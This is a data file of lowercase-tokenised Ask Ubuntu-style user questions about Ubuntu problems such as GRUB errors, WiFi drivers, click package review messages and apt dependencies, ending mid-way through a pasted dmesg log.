417312	'update-grub ' syntax error	i 've read several previous questions and found no solution . where i run the update-grub command it gives me this output : root @ agustin-ubuntu : /home/agustin # update-grub generating grub.cfg ... warning : setting grub_timeout to a non-zero value when grub_hidden_timeout is set is no longer supported . found linux image : /boot/vmlinuz-3.5.0-45-generic found initrd image : /boot/initrd.img-3.5.0-45-generic found linux image : /boot/vmlinuz-3.5.0-43-generic found initrd image : /boot/initrd.img-3.5.0-43-generic found linux image : /boot/vmlinuz-3.5.0-40-generic found initrd image : /boot/initrd.img-3.5.0-40-generic found linux image : /boot/vmlinuz-3.5.0-39-generic found initrd image : /boot/initrd.img-3.5.0-39-generic found linux image : /boot/vmlinuz-3.5.0-37-generic found initrd image : /boot/initrd.img-3.5.0-37-generic found linux image : /boot/vmlinuz-3.5.0-36-generic found initrd image : /boot/initrd.img-3.5.0-36-generic found linux image : /boot/vmlinuz-3.5.0-34-generic found initrd image : /boot/initrd.img-3.5.0-34-generic found linux image : /boot/vmlinuz-3.5.0-23-generic found initrd image : /boot/initrd.img-3.5.0-23-generic found windows 8 ( loader ) on /dev/sda1 found linux image : /boot/vmlinuz-3.5.0-45-generic found initrd image : /boot/initrd.img-3.5.0-45-generic found linux image : /boot/vmlinuz-3.5.0-43-generic found initrd image : /boot/initrd.img-3.5.0-43-generic found linux image : /boot/vmlinuz-3.5.0-40-generic found initrd image : /boot/initrd.img-3.5.0-40-generic found linux image : /boot/vmlinuz-3.5.0-39-generic found initrd image : /boot/initrd.img-3.5.0-39-generic found linux image : /boot/vmlinuz-3.5.0-37-generic found initrd image : /boot/initrd.img-3.5.0-37-generic found linux image : /boot/vmlinuz-3.5.0-36-generic found initrd image : /boot/initrd.img-3.5.0-36-generic found linux image : /boot/vmlinuz-3.5.0-34-generic found initrd image : /boot/initrd.img-3.5.0-34-generic found linux image : /boot/vmlinuz-3.5.0-23-generic found initrd image : /boot/initrd.img-3.5.0-23-generic found memtest86+ image : /boot/memtest86+.bin found linux image : /boot/vmlinuz-3.5.0-45-generic found initrd image : /boot/initrd.img-3.5.0-45-generic found linux image : /boot/vmlinuz-3.5.0-43-generic found initrd image : /boot/initrd.img-3.5.0-43-generic found linux image : /boot/vmlinuz-3.5.0-40-generic found initrd image : /boot/initrd.img-3.5.0-40-generic found linux image : /boot/vmlinuz-3.5.0-39-generic found initrd image : /boot/initrd.img-3.5.0-39-generic found linux image : /boot/vmlinuz-3.5.0-37-generic found initrd image : /boot/initrd.img-3.5.0-37-generic found linux image : /boot/vmlinuz-3.5.0-36-generic found initrd image : /boot/initrd.img-3.5.0-36-generic found linux image : /boot/vmlinuz-3.5.0-34-generic found initrd image : /boot/initrd.img-3.5.0-34-generic found linux image : /boot/vmlinuz-3.5.0-23-generic found initrd image : /boot/initrd.img-3.5.0-23-generic found windows 8 ( loader ) on /dev/sda1 error : syntax error . error : incorrect command . error : syntax error . error : incorrect command . error : syntax error . error : line no : 165 syntax errors are detected in generated grub config file . ensure that there are no errors in /etc/default/grub and /etc/grub.d/* files or please file a bug report with /boot/grub/grub.cfg.new file attached . done the problem here is that the grub customizer is not being updated after the update to the 3.5.0-45-generic version , so the entries in the menu are all messed up and i cant get them in the order i want because the grub customizer has no effect , it is displaying the proper new entries but it does n't modify the menu when i boot . this is my /etc/default/grub file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' 1 '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode= '' 640x480 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' grub_savedefault= '' false ''
417314	how to install application in live ubuntu usb stick ?	i 'm running ubuntu from usb stick ( the ubuntu is not installed , i 'm just running using the `` try ubuntu '' ) because my hdd is broken and i ca n't install ubuntu . how can i install applications because in the ubuntu software center i 've searched for vlc and it appears but i can only choose `` more information '' the install button doesnt appear . how can i install vlc ?
417321	make calibre to ask for an application each time	i have a huge ebook library of pdf files very big ones and small ones too . i use mupdf as default application to read pdf files but some files are best viewed in document viewer . i need a way so that every time when i click on a pdf file to ask for an application to open it by default . note : i use calibre to manage my library , so `` right-click → properties → open with '' is not available .
417323	my mtp capable device is not detected ? what can i do about that ?	many questions here ask for how to get a certain mtp enabled device ( a phone , tablet or media player ) working , assuming that the device is somehow supported by current foss software . but what to do if it is not ? problem : the device is not detected by mtp-detect connecting the mtp capable device to the computer and running mtp-detect from the mtp-tools package in terminal returns : no raw devices found .
417325	install both libmemcached10 and libmemcached6 ubuntu 12.04	just wondering if someone can help me here , i 'm still quite new to ubuntu an linux in general and seem to be having a problem with two packages : libmemcached10 is required for php5-memcached but libmemcached6 is required for python-pylibmc see info below- the following extra packages will be installed : libmemcached10 the following packages will be removed : libmemcached6 python-pylibmc the following new packages will be installed : libmemcached10 php5-memcached 0 upgraded , 2 newly installed , 2 to remove and 0 not upgraded . if i install either one it will break the other , i have read after a quick google search you can install them side-by-side but i 'm not 100 % sure how and if i should do this ? any help/advice would be appreciated , thanks ( if you need more information please ask )
417327	installing mint and completely removing ubuntu	i was able to successfully install ubuntu along with windows using boot repair . now i 've decided to betray ubuntu and start using mint . so i want to install mint and completely remove ubuntu . i do n't want to touch windows . is it possible ? does it have to do with boot repair ? i should first install mint and then remove ubuntu , correct ?
417328	tb not saving messages on sent folder	im using ubuntu 14.02 and tb , but when i send emails , messages are not saved on the sent folder i got the following error : there was an error saving the message to sent . retry im using a pop configuration . your help would be appreciated .
417329	ubuntu touch kernel and android device drivers ?	since the kernel is open source but the android device drivers are not , is there not a way to use existing android drives and compile a new kernel with those drivers like gps , bluetooth , wifi , etc ... ? -or- the even the structure of android drivers are not know to write an api ? i have a project in mind and i need 100 % control over the hardware . is ubuntu touch a good starting point for a quad-core based smart phone ? need input ...
417333	unable to use tenda usb antenna	so , guys . i just bought recently an antenna from tenda . when i plug it in , the ubuntu seems to conflict between two drivers . here are two driver that ubuntu listed : intel pro/wireless 3945abg [ golan ] and ralink 802.11n wlan i do not sure what is my tenda , but it is an antenna . p/s : when i plugged it in and disable the wifi card , both driver were reported that 'hardware disabled ' even i did n't touch it . and when i open network setting , ubuntu did n't do anything ( i guess ) . and here is what i recieved when i do lsusb : diamond @ diavilion : ~ $ lsusb bus 001 device 027 : id 148f:5370 ralink technology , corp. rt5370 wireless adapter bus 003 device 015 : id 056e:00ca elecom co. , ltd bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub this is the front and the model ( back )
417340	how do i lower the critical temperature ?	i have a netbook i use for school , and sometimes it does n't suspend properly when i close the lid , causing it to get hot inside it 's case . i opened it today and it was at 150f . it worked , but i did n't like the smell ( probably just the superglue on the bezel ) . i was wondering if there 's a way i can lower what the critical temperature is so it shuts down at around 140 . is there a way to do this ? does it have to be done in the bios ? ( something i read in another thread ) . it 's an hp1103
417342	what does functional_qml_application_uses_qtwebkit mean ?	in a review for my click package , i saw the following message : functional_qml_application_uses_qtwebkit what does it mean and how do i fix it ?
417346	how do i compile only drivers from kernel source	i have my phone 's kernel source and i 'm running ubuntu in android . i want to compile drivers to ubuntu but when i 'm typing 'make ' on driver folder , i encounter 'make no targets stop ' error . help me : d
417347	steam opengl glx context is not using direct rendering	i have a fresh install of ubuntu 13.10 with the latest nvidia drivers installed . however , when i run steam i am presented with the following message : steam opengl glx context is not using direct rendering i believe this is something to do with not having the correct 32 bit library , however i did install the nvidia 32 bit libraries when i installed the driver . running steam from the terminal i can see that steam is failing to find the 'swrast ' driver which it should n't be looking for anyway .
417348	messed up my sound drivers , please help !	ubuntu 13.10 sound has been working fine with whatever was built in after install . i then , stupidly , tried to install drivers from realtek for my on board sound card . reboot and now no sound and only `` dummy output '' listed . i 've tried just about everything i know ( which is minimal ) . i 've tried removing and reinstalling lots of alsa and sound packages with no luck . any tips ? thanks !
417349	empty log file while using logkeys ?	i have seen various question of this kind but solutions are not working for me , i am currently using ubuntu 13.10 . i 've done : touch test.log sudo logkeys -s -o test.log tail -- follow test.log still , i am getting an empty log file , can anybody help me to resolve this issue ?
417351	what does lint_maintainer_format mean ?	in a review for my click package , i saw the following message : lint_maintainer_format what does it mean and how do i fix it ?
417355	continuous deauthentication on a wpa enterprise network ( eduroam )	i have a dell xps13 9333 with ubuntu 13.10 and a wireless interface intel 7260 . when i connect to the eduroam network at my university ( wpa enterprise , peap , mschapv2 , with ca ) , the connection works for a couple of minutes , then it becomes slow and unstable . typing dmesg on a terminal , i can see continuously deauthentications : [ 1140.248155 ] wlan0 : deauthenticating from 90:94 : e4:90:7e:00 by local choice ( reason=1 ) [ 1140.250746 ] cfg80211 : calling crda to update world regulatory domain [ 1140.256377 ] cfg80211 : world regulatory domain updated : [ 1140.256387 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1140.256395 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1140.256401 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1140.256407 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 1140.256412 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1140.256418 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1148.870861 ] wlan0 : authenticate with 90:94 : e4:90:7e:00 [ 1148.872040 ] wlan0 : send auth to 90:94 : e4:90:7e:00 ( try 1/3 ) [ 1148.874265 ] wlan0 : authenticated [ 1148.875295 ] wlan0 : associate with 90:94 : e4:90:7e:00 ( try 1/3 ) [ 1148.876383 ] wlan0 : rx assocresp from 90:94 : e4:90:7e:00 ( capab=0x1011 status=0 aid=4 ) [ 1148.877449 ] wlan0 : associated [ 1148.877574 ] cfg80211 : calling crda for country : us [ 1148.883985 ] cfg80211 : regulatory domain changed to country : us [ 1148.883993 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 1148.883998 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 1148.884002 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 1148.884006 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1148.884009 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1148.884012 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 1148.884015 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 1148.884019 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 1152.415694 ] wlan0 : deauthenticating from 90:94 : e4:90:7e:00 by local choice ( reason=1 ) can you help me ?
417357	not booting on battery - ubuntu 1204 on probook 4445s	there were no problems after initial installation till battery drained completely while the laptop was still on . after this , booting the computer on battery - with power cord disconnected causes black or purple screen freeze before the login screen is displayed . booting when powercord is connected works flawlessly . i have tried disabling acpi on boot with the tag pci=noacpi in the grub config but to no avail . i do n't know what diagnostic information to provide , will update with logs if it can help .
417358	webdav mount apache2 ( davfs2 ) r/w	i would like to webdav mount a folder served by apache2 read/write using davfs2 . the latter works fine with other servers , but for with apache2 . i see various behaviour with diffrent clients but davfs2 is what matters . basic howtos such as http : //blog.tedd.no/2013/07/13/apache-webdav-setup-compatible-with-windows/ may work in some cases but not for me on 12.04 lts using webdav . mounting the volume works , but thats about it : # mount -t davfs -o uid=root http : //localhost/webdav/ /mnt/www please enter the username to authenticate with server http : //localhost/webdav/ or hit enter for none . username : test please enter the password to authenticate user test with server http : //localhost/webdav/ or hit enter for none . password : # ls /mnt/www ls : can not access /mnt/www : input/output error # does anybody have a clue whether that is possible at all and whats needed to get there ?
417359	what does desktop_comment_boilerplate mean ?	i 'm uploading a click package and it 's being sent back with the following message : desktop_comment_boilerplate what does it mean and how do i fix it ?
417361	what does lint_package_filename_pkgname_match mean ?	i 've submitted an app to the click store , but it comes back with this message : - lint_package_filename_pkgname_match how do i fix that ?
417363	wifi issues with ubuntu 13.10	i just bought a asus n66 usb wifi adaptor , i 've got it installed with drivers that came with the cd . but as soon as i start any programs that requires internet access ubuntu freezes . anyone that can help me ?
417366	what does lint_control_click_version_up_to_date mean ?	i submitted an app to the store and it gets rejected with this message : - lint_control_click_version_up_to_date how do i fix this ?
417368	convert hard drive to ntfs ?	as i installed ubuntu 12.04 my hard drive changed file system from ntfs to ext4 . how can i change it back to ntfs ? i do n't have to save any files on my computer all i need is to change the file system .
417369	what does desktop_icon mean ?	i 've submitted an app to the software store but it gets sent back with this error : - desktop_icon what does this mean and how do i fix it ?
417371	what does functional_qml_applicationname_matches_manifest mean ?	i submitted an application to the click store but it comes back with this error : - functional_qml_applicationname_matches_manifest what does this mean and how do i fix it ?
417373	how to set up php mail on ubuntu server ?	i have tried to set up sendmail or postfix so many times , but never got it to work . i have ubuntu server 13.04 and i wont that server to send mail throw my mail-acount on one.com that is a domain-site . i have tried with this post but i 'm getting : can not open 'ature ( authinfo , hash ' : no such file or directory and i 've typed feature in the file . now i have n't got anything installed , so i will begin on a clean sheet . edit : the client-info file is like this : ( with the actual password ) authinfo : send.one.com `` u : martin @ mizgalski.se '' `` i : martin @ mizgalski.se '' `` p : *** '' < br >
417376	execute command on reattaching byobu | screen | tmux session	can i automatically execute a command on reattaching a detached byobu ( screen or tmux ) session ? every time i login , /etc/motd is displayed . since i hardly ever log out and in , i 'd like to have the same functionality when reattaching to my detached session . this could be a simple cat /etc/motd kind of autostart .
417377	what does desktop_validates mean ?	in a review for my click package , i saw a message containing : desktop_validates what does it mean and how do i fix it ?
417379	no screen on boot	ive just installed ubuntu 13.10 on my zotac ad10 . first install in a while . im having some issues with no signal after ubuntu logo during start up . ive googled and found that nomodeset maybe could solve the problem how ever it still persists . it is connected to the tv by hdmi . there is no vga port . ive checked the box the zotac came in and i can see that the gpu is a via chrome9 . is that the issue and is there somehow i can boot and install drivers ?
417381	what does desktop_exec mean ?	in a review for my click package , the message contained this bit : desktop_exec what do i bear in mind to fix it ?
417384	what does lint_package_filename_version_match mean ?	in a review of a .click package of my app , a message contained the following : lint_package_filename_version_match how can i fix it ?
417386	how to schedule a shell script	i wanted to schedule shell scripts in my ubuntu 12.04. i know `` at '' . but i wanted some thing that would schedule my shell script exactly at 12:00 am or exactly on the first day of a month repeatedly !
417387	chromium ca n't clear browsing data	when i attempt to `` clear browsing data '' in chromium i see the following in a terminal . [ ... ] removefilesrecursively : unlink dir : directory not empty removefilesrecursively : unlink dir : directory not empty removefilesrecursively : unlink dir : directory not empty removefilesrecursively : unlink dir : directory not empty removefilesrecursively : unlink dir : directory not empty removefilesrecursively : unlink dir : directory not empty removefilesrecursively : unlink dir : directory not empty removefilesrecursively : unlink dir : directory not empty [ 3640:3669:0206/181710 : error : plugin_data_remover_impl.cc ( 263 ) ] clearsitedata returned error how can i tell which directory it is having problems with ? this is using chromium 32.0.1700.102 ubuntu 13.10
417389	how to get c , c++ , and java compilers in linux ubuntu ?	i installed ubuntu on windows 7 using wubi software , now i want to practice c , c++ and java programming . as i am new to ubuntu , i do n't know how to get those compilers . i saw so many comments on google search . there they mentioned commands sudo apt-get install build essential , but i do n't have cd - i installed ubuntu through wubi . so can you please guide me how to get those . kind regards munisekhar
417391	unmet dependencies and broken packages	i use ubuntu 12.04 on a 64-bit computer . when i try to install anything , the following happens : $ sudo apt-get install ia32-libs leyendo lista de paquetes.0.. hecho creando árbol de dependencias leyendo la información de estado ... hecho no se pudieron instalar algunos paquetes . esto puede significar que usted pidió una situación imposible o , si está usando la distribución inestable , que algunos paquetes necesarios no han sido creados o han sido movidos fuera de incoming . la siguiente información puede ayudar a resolver la situación : los siguientes paquetes tienen dependencias incumplidas : ia32-libs : depende : ia32-libs-multiarch e : no se pudieron corregir los problemas , usted ha retenido paquetes rotos . this does not depend on the package i try to install , there 's always an unmet dependency . i have tried everything related to apt-get : $ sudo apt-get install -f $ sudo apt-get update $ sudo apt-get upgrade $ sudo apt-get autoremove $ sudo apt-get clean $ sudo apt-get autoclean and every other `` solution '' i found on several forums . i also tried removing two ppa repositories from the list . synaptic says i do n't have broken packages but when i try to install something , it finds unmet dependencies . finally , i am not allowed to make a distribution upgrade for work reasons . what is going on with the packages ? can you help me ? if you need any other information , let me know . thanks in advance .
417395	why does my static ip address change itself every 24 hour period ?	i 'm using ubuntu as a server running tomcat for a web application and my static ip changes every 24 hour period from xxx.xxx.xxx.100 to xxx.xxx.xxx.102 and because of that i have to restart my session . how do i fix it ? i 'm new to linux . forgive my ignorance . thnx
417396	likewise-open and change expired password on login prompt is not working	i am having problem on ubuntu 12.04 with likewise-open and active directory authentication . i can change users password using passwd command on the machine . but if user password expires and he try to login using gui he get notice on password expiration and asked to change password but it always fails with `` invalid password '' or `` token manipulation error '' so he is locked out of the system completely . any idea what might be causing this ? some pam issue ?
417397	messed up the default nginx page , under sites-available , how to restore it ? or does someone have the deault page ?	i am using a ubuntu 12.04 server and normally worked only with apache2 , now i see that the nginx configuration is pretty the same but a little different in details . for that i want to see the default page , but the guys who uses the server with me accidently did n't copy the page ... instead he created his website on the default page . where can i find the default page ? i am talking about the default under /sites-available
417399	things to check after a hard reboot	my power got cut off while i had my battery off on my pc so it hard shut down . my question is is there anything i can do to check if the system got damaged or was doing something at the time which causes some part to fail ? i got a `` drive for /tmp is not yet ready or not preset '' error for 1-2 seconds when i booted it but then it booted just fine . i checked the startup logs but did n't see anything weird
417400	independent window control with byobu over ssh	i have two vps ' , the one i use most i 'm about to replace , i keep a byobu session with a number of windows open , and use a split terminal with multiple connections to it . i can then control each window independently of the other ssh connection . however on my new vps whenever i try the same thing , changing the byobu window changes it for all open ssh connections . both are running ubuntu and the same version of byobu , so i 'm a bit perplexed now . i 've also tried the manual options : http : //www.howtoforge.com/sharing-terminal-sessions-with-tmux-and-screen
417401	how to apply changes done to dual monitors without restarting gdm or lightdm	i know gnome-control-center display changes the file ~/.config/monitors.xml . but when i restart my machine , gnome-control-center display do n't remember my previous settings for dual monitors . so i made backup of monitors.xml and just copy the backup to ~/.config/monitors.xml when my system boots . but now i need a way to apply this settings without needing to restart lightdm/gdm or logging out of my current session , just like gnome-control-center display does . ps : i want to make a script to set the correct settings for my dual monitor setup without the need to open gnome-control-center display everytime i boot my pc , and setting all the options again ( tiring ) .
417402	random disconnection when not using wifi enough	i have a desktop with ubuntu 13.10 and i had to buy a wifi usb dongle ( edimax ew-7811un ) . i installed some drivers and now it seems to be working , except for the fact that it disconnects about every 5 minutes . i noticed that this does n't happen when i 'm talking on skype or using bittorrent . so i tried to run a periodic ping : ping -i 10 -s 1024 www.google.com but does n't seems to be working . any idea what this could be ? could it be that skype keeps the connection alive because it is more `` aggressive '' , or because it keeps continuously open a connection ?
417403	ca n't change wifi username after entering incorrect credentials ( ubuntu 13.10 )	i have to enter a username and password to log into a new wifi network . i entered the wrong username the first time i tried to connect . the username has been grayed out every time i 've tried to connect after that : wifi usernames are stored in config files inside /etc/networkmanager/system-connections/ but having to enter terminal commands to edit a config file in vi just to connect to wifi is abstrusely convoluted to most people . it 's one of those things that pushes a lot of people back to windows . : (
417404	nexus 7 installing ubuntu	i 'm stuck between steps 2 and 3 , i get to a welcome screen , select language and an arrow to setup wifi . no option is available to enable debugging . any suggestions ?
417408	ca n't see cursor in 13.10	i 'm trying out ubuntu 13.10 but i ca n't see the cursor . can anybody help me ? i 'm a total newbie in the whole linux thing and i would like some help .
417413	graphics init failed gfxboot	i just tried to install ubuntu on my netbook from an external hard drive to try it first , and then i would install if i liked it . this is the message i received upon boot up `` graphics initial error . error setting up gfxboot edd : error 8000 reading sector 68576545 '' , and that was it . i followed the instructions posted on the site and it did n't work .
417416	difference between pre-installed ubuntu and self-installed ubuntu	is there a difference if you buy an computer with ubuntu pre-installed and if you install ubuntu yourself ? are there any merits ?
417418	what does ~/ mean before a directory 's name in the terminal ?	for example , what would it mean to say : cd ~/mydirectory
417419	cairo-dock starts up at the bottom-right	when i turn on my computer ( ubuntu 13.10 ) the cairo-dock starts up automatically but it starts up at the bottom-right as you can see in the photo . i solve the problem closing cairo-dock and starting it up again , but at every system start up i have the same problem ! https : //dl.dropboxusercontent.com/u/43867401/schermata % 20del % 202014-02-06 % 2012 % 3a43 % 3a30.png
417426	ubuntu 13.10 black screen after installing nvidia optimus drivers	i have a 3xs graphite lg155 laptop from scan , which has integrated intel graphics along with a 2gb nvidia geforce gtx 765m graphics card . initially when installing 13.10 the setup was freezing but i managed to install ok by setting the nomodeset boot option at the start of the install ) . my laptop is using the the integrated graphics now with the following driver : - gallium 0.4 on llvmpipe ( llvm 3.3 , 256 bits ) i 'm running gnome 3.8 . i 've attempted to install the nvidia drivers doing the following : - sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-331 this seemed to install fine however after a reboot all i get is black screen , and i have to use another terminal to uninstall the drivers before i get a desktop back again . i 've tried uninstalling bumblebee as suggested in another internet site , but this has n't worked either . running glxgears works but very slow in fullscreen , and gnome-shell is currently maxing out the cpu when doing anything on the desktop . i 've also tried installing earlier nvidia drivers through apt-get but with the same issues . to top it off , after connecting another monitor via the laptop 's vga port , all i can get is mirroring on it . searching the web hints at needing the nvidia drivers installed before you can tell it to extend the desktop . currently 'detect displays ' does n't see the attached monitor . i 've also gone through the suggestions here to no avail : - after installing nvidia drivers , i boot into a black screen [ 13.10 ] any help appreciated . thanks
417429	how can i scan for possible viruses on my ubuntu system ?	i think i may have a virus . how would i go about checking for a virus and how can i protect my computer from any other virus ? please give detailed answer as i 'm still learning about ubuntu .
417433	dual-boot windows 7 alongside ubuntu ?	how can i dual-boot windows 7 alongside ubuntu ( i already have ubuntu 12.04 installed ) , when every time i try to create a partition it comes up with an error `` one more partitions are busy on /dev/sda ''
417436	networkmanager does n't see my wireless card	system details : ubuntu 12.04 lts , kernel is 3.5.0-45-generic , laptop is dell sputnik 3 xps 13 , wireless card is intel wireless 7260 ( rev 6b ) i was having trouble connecting to my campus cs wireless but not any other networks . my sysadmin suggested using a fix from here . i installed the backports in the accepted answer and rebooted . when i rebooted networkmanager was not detecting my wireless card and the wlan0 interface was not up and running . i immediately uninstalled the backports but the issue persisted . i tried installing the drivers for my system from here but that did not fix the issue either . i assume a factory restore would fix the problem , but i would prefer to avoid that . in anticipation of requests for certain output : lspci | grep network 02:00.0 network controller : intel corporation wireless 7260 ( rev 6b ) lshw -c network *-network description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 6b width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=iwlwifi latency=0 resources : irq:59 memory : f0400000-f0401fff dmesg | grep iwl [ 7.675832 ] iwlwifi 0000:02:00.0 : irq 59 for msi/msi-x [ 7.676309 ] iwlwifi 0000:02:00.0 : selected bus type = pci [ 7.845366 ] iwlwifi 0000:02:00.0 : loaded firmware version 22.0.6.0 op_mode iwlmvm [ 7.879810 ] iwlmvm : disagrees about version of symbol ieee80211_start_tx_ba_cb_irqsafe [ 7.879814 ] iwlmvm : unknown symbol ieee80211_start_tx_ba_cb_irqsafe ( err -22 ) [ 7.879820 ] iwlmvm : disagrees about version of symbol ieee80211_connection_loss [ 7.879822 ] iwlmvm : unknown symbol ieee80211_connection_loss ( err -22 ) [ 7.879827 ] iwlmvm : disagrees about version of symbol ieee80211_report_wowlan_wakeup [ 7.879828 ] iwlmvm : unknown symbol ieee80211_report_wowlan_wakeup ( err -22 ) [ 7.879834 ] iwlmvm : disagrees about version of symbol ieee80211_sched_scan_stopped [ 7.879836 ] iwlmvm : unknown symbol ieee80211_sched_scan_stopped ( err -22 ) [ 7.879865 ] iwlmvm : disagrees about version of symbol ieee80211_free_hw [ 7.879866 ] iwlmvm : unknown symbol ieee80211_free_hw ( err -22 ) [ 7.879874 ] iwlmvm : disagrees about version of symbol ieee80211_get_tkip_p2k [ 7.879876 ] iwlmvm : unknown symbol ieee80211_get_tkip_p2k ( err -22 ) [ 7.879881 ] iwlmvm : disagrees about version of symbol ieee80211_alloc_hw [ 7.879883 ] iwlmvm : unknown symbol ieee80211_alloc_hw ( err -22 ) [ 7.879891 ] iwlmvm : disagrees about version of symbol ieee80211_beacon_loss [ 7.879893 ] iwlmvm : unknown symbol ieee80211_beacon_loss ( err -22 ) [ 7.879904 ] iwlmvm : disagrees about version of symbol ieee80211_register_hw [ 7.879906 ] iwlmvm : unknown symbol ieee80211_register_hw ( err -22 ) [ 7.879912 ] iwlmvm : disagrees about version of symbol ieee80211_restart_hw [ 7.879914 ] iwlmvm : unknown symbol ieee80211_restart_hw ( err -22 ) [ 7.879917 ] iwlmvm : disagrees about version of symbol ieee80211_rate_control_unregister [ 7.879919 ] iwlmvm : unknown symbol ieee80211_rate_control_unregister ( err -22 ) [ 7.879923 ] iwlmvm : disagrees about version of symbol __ieee80211_get_radio_led_name [ 7.879925 ] iwlmvm : unknown symbol __ieee80211_get_radio_led_name ( err -22 ) [ 7.879943 ] iwlmvm : disagrees about version of symbol ieee80211_wake_queue [ 7.879945 ] iwlmvm : unknown symbol ieee80211_wake_queue ( err -22 ) [ 7.879972 ] iwlmvm : disagrees about version of symbol ieee80211_iter_keys [ 7.879974 ] iwlmvm : unknown symbol ieee80211_iter_keys ( err -22 ) [ 7.879988 ] iwlmvm : disagrees about version of symbol wiphy_rfkill_set_hw_state [ 7.879990 ] iwlmvm : unknown symbol wiphy_rfkill_set_hw_state ( err -22 ) [ 7.880014 ] iwlmvm : disagrees about version of symbol ieee80211_enable_rssi_reports [ 7.880015 ] iwlmvm : unknown symbol ieee80211_enable_rssi_reports ( err -22 ) [ 7.880019 ] iwlmvm : disagrees about version of symbol ieee80211_stop_tx_ba_cb_irqsafe [ 7.880021 ] iwlmvm : unknown symbol ieee80211_stop_tx_ba_cb_irqsafe ( err -22 ) [ 7.880025 ] iwlmvm : disagrees about version of symbol ieee80211_ave_rssi [ 7.880027 ] iwlmvm : unknown symbol ieee80211_ave_rssi ( err -22 ) [ 7.880033 ] iwlmvm : disagrees about version of symbol ieee80211_sta_block_awake [ 7.880035 ] iwlmvm : unknown symbol ieee80211_sta_block_awake ( err -22 ) [ 7.880039 ] iwlmvm : disagrees about version of symbol ieee80211_remain_on_channel_expired [ 7.880041 ] iwlmvm : unknown symbol ieee80211_remain_on_channel_expired ( err -22 ) [ 7.880056 ] iwlmvm : disagrees about version of symbol ieee80211_wake_queues [ 7.880058 ] iwlmvm : unknown symbol ieee80211_wake_queues ( err -22 ) [ 7.880061 ] iwlmvm : disagrees about version of symbol ieee80211_iterate_active_interfaces [ 7.880063 ] iwlmvm : unknown symbol ieee80211_iterate_active_interfaces ( err -22 ) [ 7.880066 ] iwlmvm : disagrees about version of symbol ieee80211_rate_control_register [ 7.880068 ] iwlmvm : unknown symbol ieee80211_rate_control_register ( err -22 ) [ 7.880072 ] iwlmvm : disagrees about version of symbol ieee80211_free_txskb [ 7.880074 ] iwlmvm : unknown symbol ieee80211_free_txskb ( err -22 ) [ 7.880094 ] iwlmvm : disagrees about version of symbol ieee80211_tx_status [ 7.880096 ] iwlmvm : unknown symbol ieee80211_tx_status ( err -22 ) [ 7.880099 ] iwlmvm : disagrees about version of symbol ieee80211_stop_queue [ 7.880101 ] iwlmvm : unknown symbol ieee80211_stop_queue ( err -22 ) [ 7.880108 ] iwlmvm : disagrees about version of symbol ieee80211_ready_on_channel [ 7.880110 ] iwlmvm : unknown symbol ieee80211_ready_on_channel ( err -22 ) [ 7.880114 ] iwlmvm : disagrees about version of symbol ieee80211_stop_queues [ 7.880116 ] iwlmvm : unknown symbol ieee80211_stop_queues ( err -22 ) [ 7.880130 ] iwlmvm : disagrees about version of symbol ieee80211_sched_scan_results [ 7.880131 ] iwlmvm : unknown symbol ieee80211_sched_scan_results ( err -22 ) [ 7.880138 ] iwlmvm : disagrees about version of symbol ieee80211_data_to_8023 [ 7.880140 ] iwlmvm : unknown symbol ieee80211_data_to_8023 ( err -22 ) [ 7.880148 ] iwlmvm : disagrees about version of symbol ieee80211_scan_completed [ 7.880150 ] iwlmvm : unknown symbol ieee80211_scan_completed ( err -22 ) [ 7.880153 ] iwlmvm : disagrees about version of symbol ieee80211_iterate_active_interfaces_atomic [ 7.880155 ] 